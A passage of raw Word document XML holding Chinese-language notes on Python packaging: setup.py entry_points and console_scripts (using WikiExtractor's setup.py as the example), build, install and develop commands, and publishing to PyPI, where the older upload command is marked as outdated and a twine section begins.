        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">pip -m </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>配置命令行脚本运行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5596B70D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>此处参考</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WikiExtractor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>setup.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的配置，我认为是在“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">pip -m </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令脚本命名”在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>setup</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>entry_points</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>console_scripts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>的列表中的“脚本名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>包名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>文件名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>:main</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F957D3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>其中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是那个脚本的主函数。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25AAF4EC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A82CF36" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>setup(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77541D69" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    name='wikiextractor',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F93A54" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    version=get_version(__version__),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="243FAC04" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    author='Giuseppe Attardi',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B6E6E7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    author_email='attardi@gmail.com',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C4F067" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    description='A tool for extracting plain text from Wikipedia dumps',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76477A01" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    long_description=long_description,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F20695B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    long_description_content_type="text/markdown",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09769E9B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    license='GNU Affero General Public License',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26AF4BEB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    install_requires=[],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E004546" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    url="https://github.com/attardi/wikiextractor",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B6E4C2B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    packages=find_packages(include=["wikiextractor"]),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316D013D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    classifiers=[</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD53F0D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        'Development Status :: 5 - Production/Stable',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E0B0E9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        'Intended Audience :: Developers',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EEFB6A9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        'Topic :: Text Processing :: Linguistic',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D3F26F7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        'License :: OSI Approved :: GNU Affero General Public License v3 or later (AGPLv3+)',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC6CD10" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        'Programming Language :: Python :: 3'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B5B80E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">     ],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0162B161" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    entry_points={</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="423B83DF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        "console_scripts": [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003ECD3F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            "wikiextractor = wikiextractor.WikiExtractor:main",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0454908E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            "extractPage = wikiextractor.extractPage:main",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B3A4093" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44CC16F6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6499C0F8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    python_requires='&gt;=3.6',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="798CCF9E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A05E553" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F3B5D9F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>setup</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行步骤</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="638366A4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43057F2A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>依次执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44EC4314" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">python setup.py check </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检查缺失哪些项</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D6216B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="434" w:name="OLE_LINK29"/>
      <w:r>
        <w:t>python setup.py build</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FCCE6D4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>python setup.py sdist</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="434"/>
    <w:p w14:paraId="02C02E82" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后进入生成的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>`dist`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目录，看到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>tar.gz</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>压缩包，可以解压看到有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>setup.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C4DC63" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="darkGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="darkGray"/>
        </w:rPr>
        <w:t>（没啥用且没兼容性：如果</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="darkGray"/>
        </w:rPr>
        <w:t>windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="darkGray"/>
        </w:rPr>
        <w:t>中喜欢</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="darkGray"/>
        </w:rPr>
        <w:t>exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="darkGray"/>
        </w:rPr>
        <w:t>的安装，可以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="darkGray"/>
        </w:rPr>
        <w:t>python setup.py bdist_wininst</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="darkGray"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18478D6C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这时候执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>python setup.py install</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C092F58" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>库就安装到自己的本地库文件中了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="576A04E8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="194B0C21" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>构建包调试</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:python setup.py develop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1D0B47" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>如若你的项目还处于开发阶段，频繁的安装模块，也是一个麻烦事。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="484692F6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5680BE0F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>这时候你可以使用这条命令安装，该方法不会真正的安装包，而是在系统环境中创建一个软链接指向包实际所在目录。这边在修改包之后不用再安装就能生效，便于调试。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2408255C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="678E0114" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>python setup.py develop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DCC411E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FEB0879" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将自己的包提交到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pypi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B0C500" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>提交到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pypi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>组织：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>https://pypi.python.org</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26826FF0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以方便</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">pip install </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>包名使用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="750D02FB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F384B40" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>【错误命令】过时、没有用的网络方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DAB97A9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>注册</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> pypi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE61E30" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>提交自己的包：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>python setup.py register bdist upload</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t>选择</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 1</w:t>
      </w:r>
      <w:r>
        <w:t>，之后输入用户名、密码即可完成提交。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2920F194" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>安装</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> pypi </w:t>
      </w:r>
      <w:r>
        <w:t>中自己提交的包：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>pip install firsthirdpackage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE081F2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>【成功】上传</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pypi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>: twine</w:t>
      </w:r>
    </w:p>
